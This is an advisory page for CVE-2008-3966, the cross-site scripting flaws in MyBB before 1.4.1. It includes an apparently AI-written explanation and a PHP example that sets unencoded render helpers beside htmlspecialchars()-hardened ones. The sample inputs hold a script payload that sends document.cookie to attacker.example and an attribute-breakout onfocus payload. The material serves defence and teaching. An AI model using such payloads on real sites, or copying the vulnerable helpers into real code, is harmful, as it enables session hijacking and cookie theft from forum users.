CVE-2008-3966
Description
Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via (1) a certain referrer field in usercp2.php, (2) a certain location field in inc/functions_online.php, and certain (3) tsubject and (4) psubject fields in moderation.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Multiple XSS vulnerabilities in MyBB before 1.4.1 allow remote attackers to inject arbitrary web script via referrer, location, and subject fields.
Vulnerability
MyBB (MyBulletinBoard) versions prior to 1.4.1 contain multiple cross-site scripting (XSS) vulnerabilities. The flaws lie in how user-supplied input is handled in three files: usercp2.php (the referrer field), inc/functions_online.php (the location field), and moderation.php (the tsubject and psubject fields). Values supplied through these fields are written into the page without adequate HTML encoding for the output context, so an attacker can inject arbitrary web script or HTML that the browser then interprets as part of the page [1][2].
Exploitation
A remote attacker exploits these flaws by placing script or HTML in the affected referrer, location, tsubject or psubject values, either through a crafted link or through a form submission that reaches the vulnerable code path. The description and references do not state what privileges each vector requires: usercp2.php serves the user control panel and moderation.php serves moderation actions, so those paths are presumably reachable only by a logged-in user or a moderator, whereas inc/functions_online.php formats the location shown in the online-users listing, so that vector is exposed to whoever views that list. In every case the injected script runs in the browser of the user who views the affected page, within the forum's origin [1][2].
Impact
Successful exploitation lets the attacker run arbitrary JavaScript in the victim's browser within the forum's origin. That enables session hijacking, defacement, theft of cookies or form input, and any other action the victim's session permits. The impact is bounded by the victim's privileges; if a moderator or administrator is the victim, the attacker gains the moderation or administrative actions of that session [1][2].
Mitigation
The vulnerabilities are fixed in MyBB version 1.4.1, released on September 9, 2008 [1][2]. Forum administrators should upgrade to that version or later. No workarounds are documented in the available references. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
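The defect class described above, as an added illustration that is not code from MyBB or from its 1.4.1 fix: two hypothetical PHP render helpers, one for a location cell in an online-users table (a text-node context) and one for a subject pre-filled into a moderation form input (an attribute context). Each is shown in its unencoded, vulnerable form beside a form that encodes with htmlspecialchars() for the output context. The function names, markup, and sample strings (including the attacker.example host) are constructed for this example.

```php
<?php
// Added example for this page, not MyBB code: the output-encoding defect
// class behind CVE-2008-3966, shown on two hypothetical render helpers.
declare(strict_types=1);

// Text-node context, e.g. a "location" cell in an online-users table.
// VULNERABLE: attacker-controlled string concatenated straight into HTML.
function render_location_vulnerable(string $location): string
{
    return '<td class="location">' . $location . '</td>';
}

// HARDENED: encode for an HTML text node. ENT_SUBSTITUTE keeps malformed
// UTF-8 from making htmlspecialchars() silently return an empty string.
function render_location_hardened(string $location): string
{
    $safe = htmlspecialchars($location, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<td class="location">' . $safe . '</td>';
}

// Attribute context, e.g. a subject pre-filled into a moderation form.
// VULNERABLE: a double quote in the value closes the attribute early.
function render_subject_input_vulnerable(string $subject): string
{
    return '<input type="text" name="subject" value="' . $subject . '">';
}

// HARDENED: ENT_QUOTES encodes both " and ', so the value cannot escape
// the attribute even if a template later switches to single quotes.
function render_subject_input_hardened(string $subject): string
{
    $safe = htmlspecialchars($subject, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="subject" value="' . $safe . '">';
}

// Constructed sample inputs: one benign, two shaped like the injected
// script/HTML the advisory describes (hostname is a reserved .example name).
$samples = [
    'Viewing forum: General Discussion',
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    '" autofocus onfocus="alert(document.domain)',
];

foreach ($samples as $s) {
    echo "location (vulnerable): " . render_location_vulnerable($s) . PHP_EOL;
    echo "location (hardened):   " . render_location_hardened($s) . PHP_EOL;
    echo "subject  (vulnerable): " . render_subject_input_vulnerable($s) . PHP_EOL;
    echo "subject  (hardened):   " . render_subject_input_hardened($s) . PHP_EOL . PHP_EOL;
}
```

Run it with `php example.php`. In the vulnerable output the second sample arrives at the browser as a live script element and the third breaks out of the value attribute into an event handler, while the hardened output renders both as literal text. Encoding at the sink is the general fix for this class; for the affected MyBB files the references document only the 1.4.1 upgrade.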
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
31 CPE entries:
- cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:* (range: <=1.4.0)
- cpe:2.3:a:mybb:mybb:1.00:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.01:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.02:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.03:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.04:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.1:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.3:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.4:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.5:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.6:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.7:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.1.8:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.0:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.1:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.10:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.11:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.12:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.13:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.2:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.3:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.4:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.5:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.6:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.7:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.8:*:*:*:*:*:*:*
- cpe:2.3:a:mybb:mybb:1.2.9:*:*:*:*:*:*:*
- (no CPE) range: <1.4.1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
6 news mentions
No linked articles in our index yet.